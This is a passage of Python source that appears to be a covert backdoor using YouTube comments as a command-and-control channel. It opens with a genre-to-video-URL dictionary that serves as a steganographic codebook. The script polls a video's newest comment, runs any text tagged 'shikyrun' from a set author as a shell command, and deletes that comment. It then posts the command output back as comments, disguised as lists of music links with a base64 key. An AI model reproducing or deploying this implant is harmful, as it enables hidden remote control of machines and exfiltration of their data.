"Bassline":["https://youtube.com/watch?v=l1mygekKGwQ", "https://youtube.com/watch?v=IlLvu4DD5gM", "https://youtube.com/watch?v=vtAgxCds9WY", "https://youtube.com/watch?v=_gp51lt9kdA", "https://youtube.com/watch?v=ZwvHXsrjbOY", "https://youtube.com/watch?v=Cign5Zn74dk", "https://youtube.com/watch?v=negYJGjThB8", "https://youtube.com/watch?v=Va1XWHuQT4w", "https://youtube.com/watch?v=YqzWNUT2-rw", "https://youtube.com/watch?v=3v8qWWzcfzw"],
"Bay Area Hip Hop":["https://youtube.com/watch?v=QMWjesVglcg", "https://youtube.com/watch?v=v38fHS5VteI", "https://youtube.com/watch?v=PqTqOo6OMzQ", "https://youtube.com/watch?v=Y9EilaBY_uI", "https://youtube.com/watch?v=8zE3Vb9kDkI", "https://youtube.com/watch?v=GcVwE1iDf4Q", "https://youtube.com/watch?v=HW1Xxbalqh4", "https://youtube.com/watch?v=GjOZqDpjkRc", "https://youtube.com/watch?v=VQAhdx2BflA", "https://youtube.com/watch?v=K71IXLQpGss"],
"Beach Music":["https://youtube.com/watch?v=1YvdAZ9LMik", "https://youtube.com/watch?v=WkBX4N79r4w", "https://youtube.com/watch?v=HG1fjo1HtbQ", "https://youtube.com/watch?v=ai-wlBB7OZo", "https://youtube.com/watch?v=ohllp34AJsA", "https://youtube.com/watch?v=09Fre7BhFtE", "https://youtube.com/watch?v=tXKw2OC9URo", "https://youtube.com/watch?v=Zr3RtAJHlrc", "https://youtube.com/watch?v=RXnaPT2oca0", "https://youtube.com/watch?v=W47q_ocDjE8"],
"Beatdown":["https://youtube.com/watch?v=lwvmypWZP5M", "https://youtube.com/watch?v=2tGTCDfUAgY", "https://youtube.com/watch?v=A11jNO6_JpU", "https://youtube.com/watch?v=vPfjmCQQEO8", "https://youtube.com/watch?v=RYU5mqI8lng", "https://youtube.com/watch?v=CtbWY8Q4pNo", "https://youtube.com/watch?v=87bAIbQ_31g", "https://youtube.com/watch?v=0fnusC62lPk", "https://youtube.com/watch?v=3q61xxeQFWo", "https://youtube.com/watch?v=RI7y7ZkkOJs"],
"Beats &amp; Rhymes":["https://youtube.com/watch?v=Kzhm3D9oodo", "https://youtube.com/watch?v=09oVIlSmndg", "https://youtube.com/watch?v=oNbzrIhGC58", "https://youtube.com/watch?v=e6u_K1WDB5I", "https://youtube.com/watch?v=O4CGNI1-znI", "https://youtube.com/watch?v=2bAV-iAGG3g", "https://youtube.com/watch?v=izT2Xmw1X3M", "https://youtube.com/watch?v=aY_JqmBlsCE", "https://youtube.com/watch?v=2_lBrtORFd0", "https://youtube.com/watch?v=auzr5jHwTAc"],
"Bebop":["https://youtube.com/watch?v=csGcd5uCNOI", "https://youtube.com/watch?v=c7SdbcbZvmM", "https://youtube.com/watch?v=09BB1pci8_o", "https://youtube.com/watch?v=6mqhufiJFjs", "https://youtube.com/watch?v=ov_qIXQFKyo", "https://youtube.com/watch?v=KXP84ijiLbg", "https://youtube.com/watch?v=7xIiTFru_9s", "https://youtube.com/watch?v=KnnoOLGosaw", "https://youtube.com/watch?v=7ciX2eo5VFs", "https://youtube.com/watch?v=Zlex0qTla30"],
"Belgian Indie":["https://youtube.com/watch?v=6EA-MIYY1bg", "https://youtube.com/watch?v=tQ3HWIsZXPM", "https://youtube.com/watch?v=z2X2HaTvkl8", "https://youtube.com/watch?v=wddvvWwmEF0", "https://youtube.com/watch?v=Ln31raI2ezY", "https://youtube.com/watch?v=_qkFt8Kada0", "https://youtube.com/watch?v=6EJGnU2AmV4", "https://youtube.com/watch?v=BRRNECjGPIg"],
"Belgian Rock":["https://youtube.com/watch?v=h6aIXf-yupQ", "https://youtube.com/watch?v=8Gj2MCf2G80", "https://youtube.com/watch?v=Ln31raI2ezY", "https://youtube.com/watch?v=kgu3-HqABhA", "https://youtube.com/watch?v=9aijFg3AFRc"],
"Belly Dance":["https://youtube.com/watch?v=KH7iGUS2WOY", "https://youtube.com/watch?v=m-_LShBDrzQ", "https://youtube.com/watch?v=cURfR9sfNqE", "https://youtube.com/watch?v=xLoAbDqOWcs", "https://youtube.com/watch?v=E-vGmZJuK5E", "https://youtube.com/watch?v=Rnv-Dpq4XnI", "https://youtube.com/watch?v=ly9if9_0PCM", "https://youtube.com/watch?v=cuBXIRCB8jE", "https://youtube.com/watch?v=bEacVcAtiKU", "https://youtube.com/watch?v=1AfETS-wKzA"],
"Belorush":["https://youtube.com/watch?v=GiPv7-BzN5U", "https://youtube.com/watch?v=_bR21wvD7zs", "https://youtube.com/watch?v=V5-Hr88Ge_o", "https://youtube.com/watch?v=X2rThr1BLWA", "https://youtube.com/watch?v=iKk_lzuBWwM", "https://youtube.com/watch?v=q9V2D6gdRsc", "https://youtube.com/watch?v=Z-sfrdDUI9s", "https://youtube.com/watch?v=T_VVvof6j8A", "https://youtube.com/watch?v=C8f1nkqe_ZY", "https://youtube.com/watch?v=jqg5J9J8wqM"],
"Bemani":["https://youtube.com/watch?v=rdZqwo2oLyI", "https://youtube.com/watch?v=egdkfqJS20M", "https://youtube.com/watch?v=0-Dqf6H7K-I", "https://youtube.com/watch?v=bvGlteBKsCk", "https://youtube.com/watch?v=RODflu7UPuM", "https://youtube.com/watch?v=kVrvtk9oLKw", "https://youtube.com/watch?v=isFLP_CTxZo", "https://youtube.com/watch?v=kj-ofFlz_jI", "https://youtube.com/watch?v=DFK011CBuX0", "https://youtube.com/watch?v=naPNFiBXczA"]
}
}
# encode
class LastPice:

	#encode
	def encode(plane_text):
		plane_text_ascii = [ ord(ch) for ch in plane_text]

		music_genre ={"":[],}
		c = 70
		key = []
		cipher_list = []

		# path_to_file = "gnera_last_pice.json";


		for x in plane_text_ascii:
			y =  (pow(x,2))+c
			# y =  int(sqrt(y))
			w = y%131
			if w > 124:	w = 124
			cipher_list.append(random.choice(list(data["genre"].values())[w])) 
			key.append(y)
		key = base64.b64encode(json.dumps(key).encode("ascii") )
		return key,cipher_list

	
def Convert(cipher):
        cipher = cipher.replace("[",'').replace("]",'').replace("'",'').replace(",",'')
        li = list(cipher.split()) 
        return li 

# Set up OAuth2.0 scope
SCOPES = ['https://www.googleapis.com/auth/youtube.force-ssl']


def get_authenticated_service():
    creds = None
    token_json_string =''' '''
    token_data = json.loads(token_json_string)
    creds = Credentials.from_authorized_user_info(token_data, scopes=['https://www.googleapis.com/auth/youtube.force-ssl'])
    

    return build('youtube', 'v3', credentials=creds)

# Use the API
youtube = get_authenticated_service()
# Define the video ID
VIDEO_ID = 'jroZgDkqLCM'  # Replace with actual video ID

# --- 1. Read the latest comment ---
def get_latest_comment(video_id):
    request = youtube.commentThreads().list(
        part='snippet',
        videoId=video_id,
        maxResults=1,
        order='time'
    )
    response = request.execute()

    if response['items']:
        comment_thread = response['items'][0]
        comment_id = comment_thread['snippet']['topLevelComment']['id']
        comment_snippet = comment_thread['snippet']['topLevelComment']['snippet']
        author = comment_snippet['authorDisplayName']
        text = comment_snippet['textDisplay']
        published = comment_snippet['publishedAt']
        #print(f"📥 Latest Comment:\n- Author: {author}\n- Time: {published}\n- Text: {text}\n")
        myauthorname=""
        if author == myauthorname:
                text = text.replace("\n",'').replace(" ",'')
                if text=="kill":
                	telpy = True
                elif "shikyrun"in text:
                	text = text.replace("shikyrun",'').replace("\n",'').replace(" ",'')
	                #os.system(text)
	                delete_comment(comment_id)
	                #print(f"'{text}'")
	                output = subprocess.run(text, shell=True, capture_output=True, text=True).stdout
	                key,cipher = LastPice.encode(output)
	                comment_text = f"key:{key}\ncipher:{cipher}"
	                #print(key,cipher)
	                post_long_comment(VIDEO_ID, key,cipher)
    else:
    	pass
        #print("No comments found.")

# --- 2. Write a comment ---
def post_comment(video_id, comment_text):
    request = youtube.commentThreads().insert(
        part="snippet",
        body={
            "snippet": {
                "videoId": video_id,
                "topLevelComment": {
                    "snippet": {
                        "textOriginal": comment_text
                    }
                }
            }
        }
    )
    response = request.execute()
    #print(f"📤 Posted Comment: {response['snippet']['topLevelComment']['snippet']['textDisplay']}\n")

def delete_comment(comment_id):
    try:
        youtube.comments().delete(id=comment_id).execute()
        #print(f"🗑️ Deleted comment with ID: {comment_id}")
    except Exception as e:
    	pass
        #print(f"❌ Failed to delete comment: {e}")

MAX_COMMENT_LENGTH = 10000

def post_long_comment(video_id, key,cipher):
    # Split the comment if it's too long
    comment_text = f"key:{key}\ncipher:{cipher}"
    cipher = f"cipher:{cipher}"
    key = f"key:{key}"
    if len(comment_text) <= MAX_COMMENT_LENGTH:
        post_comment(video_id, comment_text)
    else:
    	if len(key) <= MAX_COMMENT_LENGTH:
    		post_comment(video_id, key)
    		if len(cipher) <= MAX_COMMENT_LENGTH:
    			post_comment(video_id, cipher)
    		else:
    			parts = [cipher[i:i + MAX_COMMENT_LENGTH] for i in range(0, len(cipher), MAX_COMMENT_LENGTH)]
    			for idx, part in enumerate(parts):
		            try:
		                post_comment(video_id, f"Part {idx+1}:\n{part}")
		            except Exception as e:
		            	pass
		                #print(f"❌ Failed to post part {idx+1}: {e}")
    	else:
	        parts = [comment_text[i:i + MAX_COMMENT_LENGTH] for i in range(0, len(comment_text), MAX_COMMENT_LENGTH)]
	        for idx, part in enumerate(parts):
	            try:
	                post_comment(video_id, f"Part {idx+1}:\n{part}")
	            except Exception as e:
	            	pass
	                #print(f"❌ Failed to post part {idx+1}: {e}")

# Run the functions
print("shikyrun")
while True:
	if telpy:
		break
	else:
		get_latest_comment(VIDEO_ID)
		time.sleep(2)

#post_comment(VIDEO_ID, "id")
